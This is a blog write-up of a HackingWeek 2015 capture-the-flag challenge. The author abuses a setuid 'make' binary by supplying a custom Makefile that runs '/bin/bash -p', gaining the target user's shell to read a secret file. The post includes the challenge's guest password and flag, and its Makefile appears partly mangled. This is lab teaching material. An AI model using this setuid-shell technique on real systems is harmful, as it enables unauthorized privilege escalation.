English [HackingWeek 2015] [Exploit3] Write Up


Log on as guest (password: shu1eKoo) on machine
You will find the hidden validation key in /home/exploit03/.secret.

$> ssh guest@


The goal of this challenge is to read the /home/exploit03/.secret file wich is read only for the exploit03 user, and contains the flag.

By listing the /home/exploit03/project/ directory, we can see these files :

guest@ns314076:/home/exploit03/project$ ls -la
total 1704
dr-xr-xr-x 2 exploit03 exploit03 4096 Apr 30 23:47 .
dr-xr-xr-x 3 exploit03 exploit03 4096 Apr 29 15:47 ..
-r-sr-sr-x 1 exploit03 exploit03 549452 Apr 29 15:46 make
-r--r--r-- 1 exploit03 exploit03 1176037 Apr 30 23:47 make-3.81-alpha.tar.bz2
-r--r--r-- 1 exploit03 exploit03 269 Apr 29 15:46 Makefile

There are three files : make, make-3.81-alpha.tar.bz2 and Makefile. The most interesting thing here is the make binary which is setuid, meaning that every time we launch this binary, we will automatically have the exploit03 rights. Pretty interesting, knowing that we have to read an exploit03’s file :).

So, with this piece of information, what can we do ? Launch the make binary ? OK, but it won’t read the .secret file. It only reads the Makefile file in order to know what to do.
It would be cool to modify the Makefile in order to insert something like… /bin/sh ? 😉
Unfortunately, the Makefile is read-only, meaning that we can’t modify it. Pretty annoying isn’t it ?

But hey wait a minute !? THIS Makefile is read-only, what about creating our own Makefile and use it instead of this useless Makefile ?
OK Let’s try this !

First, we have to man make, in order to be sure that we can use Makefile which is in another directory.

guest@ns314076:/home/exploit03/project$ man make

make - GNU make utility to maintain groups of programs

make [ -f makefile ] [ options ] ... [ targets ] ...


-f file, --file=file, --makefile=FILE
Use file as a makefile.

hmmm… Seems pretty good no ?! Now we just have to create a new Makefile :

guest@ns314076:/home/exploit03/project$ cd /tmp
guest@ns314076:/tmp$ mkdir me
guest@ns314076:/tmp$ cd me
guest@ns314076:/tmp/me$ nano Makefile
guest@ns314076:/tmp/me$ cat Makefile
CP = /bin/cp
CHMOD = /bin/chmod

DIR = make-3.81-alpha

.PHONY: install clean

all: $(DIR)/make

/bin/bash -p

and to launch the make with this new awesome Makefile. If everything is going well, we should have a shell with exploit03 rights and read the .secret file !

guest@ns314076:/tmp/me$ /home/exploit03/project/make -f ./Makefile all
/bin/bash -p
bash-4.2$ cat /home/exploit03/.secret
bash-4.2$ exit

Perfect ! The flag of this chall is uY2Waed3ie


The lsd

Leave a Reply

Your email address will not be published. Required fields are marked *